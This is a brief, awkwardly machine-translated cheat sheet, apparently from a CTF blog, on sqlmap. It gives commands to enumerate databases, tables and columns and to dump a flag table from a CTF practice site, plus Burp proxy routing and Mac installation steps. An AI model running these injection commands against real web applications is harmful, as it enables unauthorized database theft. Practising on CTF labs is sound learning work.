Use the Mac under sqlmap
- sqlmap -u "url" -dbs (Display Database)
eg: sqlmap -u http://10.10.129.23:8088/getPost.action?postsId=14 --dbs
Then sqlmap.py under windows -u "url" -dbs
( --Dbs : DBS has two front bars )
- Use burp sqlmap fetch requests initiated by the tool: first set burp proxy, then the proxy connection sqlmap, then initiate a request, the request may be transmitted sqlmap intercepted burp
sqlmap connection burp proxy command:
sqlmap --proxy="http://127.0.0.1:8080" -u "xxxxx"
windows command: (under mac without .py)
// statement --tables -D "" # listed in the specified database tables
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tables -D web1
// statement --columns -T "user" -D "mysql " # listed in the mysql database user all the fields of the table
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --columns -T flag -D web1
Get flag
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dump -T flag -D web1
Installation configuration sqlmap :
- The sqlmap installation package on python2.7 under the folder of files
- Configuration sqlmap environment variables
vi ~ / .bash_profile added
alias sqlmap="/Applications/Python\ 2.7/sqlmap/sqlmap.py"
Then source ~ / .bash_profile ## This command is to bash reload the configuration so that just takes effect.
After the need to use sqlmap , you only need terminal input sqlmap can, familiar interface out
https://www.cnblogs.com/50614090/p/6086054.html